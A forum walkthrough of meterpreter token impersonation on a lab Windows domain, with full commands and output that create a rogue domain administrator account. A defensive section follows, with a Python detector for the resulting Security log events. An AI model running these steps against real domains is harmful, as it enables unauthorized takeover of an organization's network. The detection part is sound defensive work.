Hi all!
The "how to" forum is closed, so I post here.
This is how to create a domain admin user through an exploited domain PC on which we hold local machine administration rights.
The domain is called LAB.local based on Windows 2008R2. LABServer07 is the primary DC.
The exploited machine is joined to the domain and we have a meterpreter shell with local PC admin rights.
Basic commands used after exploitation:
Find process --> ps
Load incognito extension --> use incognito
Listing available tokens --> list_tokens -u
Impersonate token --> impersonate_token <token>
Get a command shell using the token --> execute -f cmd.exe -i -t -H -c
Add a domain user --> net user USER PASSWORD /add /domain
Add the created user to the domain's Administrators group --> net localgroup administrators USER /add /domain
Interact with session 1 and list process:
Code:
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps

Process list
============

 PID   Name             Arch  Session  User                           Path
 ---   ----             ----  -------  ----                           ----
 0     [System Process]
 4     System           x86   0        NT AUTHORITY\SYSTEM
 1736  smss.exe         x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 1788  csrss.exe        x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 1812  winlogon.exe     x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 1856  services.exe     x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 1868  lsass.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 2032  ibmpmsvc.exe     x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\ibmpmsvc.exe
 176   svchost.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 312   svchost.exe      x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\svchost.exe
 404   svchost.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 508   EvtEng.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\EvtEng.exe
 604   S24EvMon.exe     x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\S24EvMon.exe
 824   svchost.exe      x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\svchost.exe
 848   svchost.exe      x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\system32\svchost.exe
 1228  spoolsv.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1304  svchost.exe      x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\system32\svchost.exe
 1344  AcPrfMgrSvc.exe  x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
 1416  btwdins.exe      x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\Bluetooth Software\bin\btwdins.exe
 1484  RegSrvc.exe      x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\RegSrvc.exe
 1676  TpKmpSvc.exe     x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\TpKmpSVC.exe
 180   AcSvc.exe        x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\AcSvc.exe
 700   MOMService.exe   x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Microsoft Forefront\Client Security\Client\Microsoft Operations Manager 2005\MOMService.exe
 224   wmiprvse.exe     x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 948   SvcGuiHlpr.exe   x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\SvcGuiHlpr.exe
 2580  alg.exe          x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\System32\alg.exe
 3276  explorer.exe     x86   0        LAB\utente1                    C:\WINDOWS\Explorer.EXE
 3908  tp4mon.exe       x86   0        LAB\utente1                    C:\WINDOWS\system32\tp4mon.exe
 1112  igfxtray.exe     x86   0        LAB\utente1                    C:\WINDOWS\system32\igfxtray.exe
 1124  hkcmd.exe        x86   0        LAB\utente1                    C:\WINDOWS\system32\hkcmd.exe
 2192  igfxpers.exe     x86   0        LAB\utente1                    C:\WINDOWS\system32\igfxpers.exe
 1860  ACTray.exe       x86   0        LAB\utente1                    C:\Programmi\ThinkPad\ConnectUtilities\ACTray.exe
 2596  ACWLIcon.exe     x86   0        LAB\utente1                    C:\Programmi\ThinkPad\ConnectUtilities\ACWLIcon.exe
 2700  smax4pnp.exe     x86   0        LAB\utente1                    C:\Programmi\Analog Devices\Core\smax4pnp.exe
 2904  ctfmon.exe       x86   0        LAB\utente1                    C:\WINDOWS\system32\ctfmon.exe
 3076  BTTray.exe       x86   0        LAB\utente1                    C:\Programmi\ThinkPad\Bluetooth Software\BTTray.exe
 3572  cmd.exe          x86   0        LAB\admin                      C:\WINDOWS\system32\cmd.exe        <---------- Look at these
 2912  cmd.exe          x86   0        LAB\admin                      C:\WINDOWS\system32\cmd.exe        <---------- Look at these
 1472  rundll32.exe     x86   0        LAB\admin                      C:\WINDOWS\system32\rundll32.exe   <---------- Look at these
 1256  cmd.exe          x86   0        LAB\admin                      C:\WINDOWS\system32\cmd.exe        <---------- Look at these
 3044  msiexec.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\msiexec.exe
 3224  rundll32.exe     x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\rundll32.exe

Load extension, list tokens and impersonate domain admin:
Code:
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
LAB\admin
LAB\utente1
NT AUTHORITY\SERVIZIO DI RETE
NT AUTHORITY\SERVIZIO LOCALE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ACCESSO ANONIMO

meterpreter > impersonate_token lab\\admin        <---------- Double backslash DOMAIN\\name
[+] Delegation token available
[+] Successfully impersonated user LAB\admin
meterpreter > getuid
Server username: lab\admin

Get a domain admin shell:
Code:
meterpreter > execute -f cmd.exe -i -t -H -c
Process 3804 created.
Channel 1 created.
Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Create a new domain user and add it to the domain's Administrators group.
Obviously the victim PC is an Italian version, so where the output reads "Esecuzione comando riuscita" read it as "The command completed successfully".
Code:
C:\WINDOWS\system32>net user TestUser Passw0rd /add /domain
net user TestUser Passw0rd /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.
Esecuzione comando riuscita.

C:\WINDOWS\system32>net localgroup /domain
net localgroup /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Alias per \\LABServer07.lab.local

-------------------------------------------------------------------------------
*Accesso compatibile precedente a Windows 2000
*Accesso DCOM a Servizi certificati
*Account Operators
*Administrators
*Backup Operators
*Cert Publishers
*Cryptographic Operators
*Distributed COM Users
*DnsAdmins
*Gruppo di accesso autorizzazione Windows
*Guests
*IIS_IUSRS
*Incoming Forest Trust Builders
*Lettori registri eventi
*Network Configuration Operators
*Ogg. autorizzati a replica passw. in controller sola lettura
*Ogg. non autoriz. a replica passw. in controller sola lettura
*Performance Log Users
*Performance Monitor Users
*Print Operators
*Replicator
*Server licenze di Terminal Server
*Server Operators
*Server RAS e IAS
*Users
*Utenti desktop remoto
Esecuzione comando riuscita.

C:\WINDOWS\system32>net localgroup administrators TestUser /add /domain
net localgroup administrators TestUser /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.
Esecuzione comando riuscita.
Thanks to all
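From the defender's side, the two net commands at the end of the walkthrough are exactly the changes a domain controller records in its Security log: the net user /add /domain call produces event 4720 (a user account was created), and the net localgroup administrators ... /add /domain call adds the account to the domain's built-in Administrators group, which is a domain local group and so produces event 4732 (member added to a security-enabled local group); an addition to Domain Admins, a global group, would instead produce 4728. The script below is an added example, not code from the original post: it parses a handful of constructed log lines written in a simplified key=value layout (the field names SubjectUserName, TargetUserName and MemberName follow the real event schema, but the line format is an assumption made so the example runs offline) and raises a high-severity alert when an account is added to a privileged group within a short window of its own creation, which is the pattern the walkthrough leaves behind.

```python
import re
from datetime import datetime, timedelta

# Windows Security log event IDs (real values, Windows Server 2008 R2 and later).
EVENT_USER_CREATED = 4720
EVENT_LOCAL_GROUP_MEMBER_ADDED = 4732   # security-enabled local group, e.g. Builtin\Administrators
EVENT_GLOBAL_GROUP_MEMBER_ADDED = 4728  # security-enabled global group, e.g. Domain Admins

# Groups whose membership changes should always be reviewed (compared case-insensitively).
PRIVILEGED_GROUPS = {
    "administrators", "domain admins", "enterprise admins", "schema admins",
    "account operators", "backup operators", "server operators",
}

# Constructed sample log, NOT real DC output: one event per line, ISO timestamp first,
# then key=value fields; values containing spaces are double-quoted.
SAMPLE_LOG = [
    '2012-03-01T10:14:55Z EventID=4624 SubjectUserName=- TargetUserName=utente1 TargetDomainName=LAB LogonType=2',
    '2012-03-01T10:15:02Z EventID=4720 SubjectUserName=admin SubjectDomainName=LAB TargetUserName=TestUser TargetDomainName=LAB',
    '2012-03-01T10:15:40Z EventID=4732 SubjectUserName=admin SubjectDomainName=LAB TargetUserName=Administrators TargetDomainName=Builtin MemberName="CN=TestUser,CN=Users,DC=lab,DC=local"',
    '2012-03-01T11:02:10Z EventID=4732 SubjectUserName=helpdesk SubjectDomainName=LAB TargetUserName="Remote Desktop Users" TargetDomainName=Builtin MemberName="CN=utente1,CN=Users,DC=lab,DC=local"',
    '2012-03-02T09:00:00Z EventID=4728 SubjectUserName=admin SubjectDomainName=LAB TargetUserName="Domain Admins" TargetDomainName=LAB MemberName="CN=svc_backup,CN=Users,DC=lab,DC=local"',
]

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Parse one constructed log line into a dict with a datetime timestamp and an int EventID."""
    ts, _, rest = line.partition(" ")
    fields = {key: value.strip('"') for key, value in FIELD_RE.findall(rest)}
    fields["timestamp"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    fields["EventID"] = int(fields["EventID"])
    return fields


def member_account(member_name):
    """Reduce the MemberName distinguished name (CN=TestUser,CN=Users,...) to a lower-case account name."""
    first_component = member_name.split(",")[0]
    return first_component.split("=", 1)[-1].lower()


def find_privilege_grants(lines, window=timedelta(minutes=30)):
    """Return one alert per addition to a privileged group.

    An addition is 'high' severity when the member account was itself created
    (event 4720) less than `window` earlier in the same log, otherwise 'medium'.
    """
    created = {}  # account name (lower-case) -> (creation time, creating subject)
    alerts = []
    for event in map(parse_event, lines):
        if event["EventID"] == EVENT_USER_CREATED:
            created[event["TargetUserName"].lower()] = (event["timestamp"], event["SubjectUserName"])
        elif event["EventID"] in (EVENT_LOCAL_GROUP_MEMBER_ADDED, EVENT_GLOBAL_GROUP_MEMBER_ADDED):
            group = event["TargetUserName"]          # for 47xx group events this field holds the group name
            if group.lower() not in PRIVILEGED_GROUPS:
                continue
            member = member_account(event["MemberName"])
            alert = {
                "severity": "medium",
                "group": group,
                "member": member,
                "by": event["SubjectUserName"],
                "at": event["timestamp"],
                "seconds_since_creation": None,
            }
            if member in created:
                age = event["timestamp"] - created[member][0]
                if age <= window:
                    alert["severity"] = "high"
                    alert["seconds_since_creation"] = int(age.total_seconds())
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in find_privilege_grants(SAMPLE_LOG):
        print("[%s] %s added %s to %s at %s (created %s s earlier)" % (
            alert["severity"].upper(), alert["by"], alert["member"], alert["group"],
            alert["at"].isoformat(), alert["seconds_since_creation"]))
```

Run against the constructed log the script flags the TestUser addition as high severity (38 seconds after creation) and the svc_backup addition to Domain Admins as medium; the Remote Desktop Users change and the logon event are ignored. On a real DC the same fields come out of the EVTX record's EventData, so only parse_event needs to change to feed a production log into find_privilege_grants.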